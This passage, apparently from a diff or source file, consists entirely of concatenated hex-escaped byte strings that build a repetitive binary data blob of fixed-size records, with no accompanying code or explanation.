+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00"
+"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x9c\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\xc2\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00"
+"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x9c\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x98\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x9c\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x98\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x98\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x9c\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x01\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00"
+"\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00"
+"\x00\x00\x20\x00\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00"
+"\x00\x80\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00"
+"\xa9\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
+"\x00\x80\x01\x00\x00\x00\x00\x00\x00\x00\x20\x00\xa9\x00\x00\x00"
+"\x00\x30\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00"
+"\x00\x00\x00\x00\x00\x00\x20\x00\x99\x00\x00\x00\x00\x30\x00\x00"
+"\xb2\x00\x00\x00\x00\x80\x00\x00\x00\x80\x01\x00\x00\x04\x00\x00"
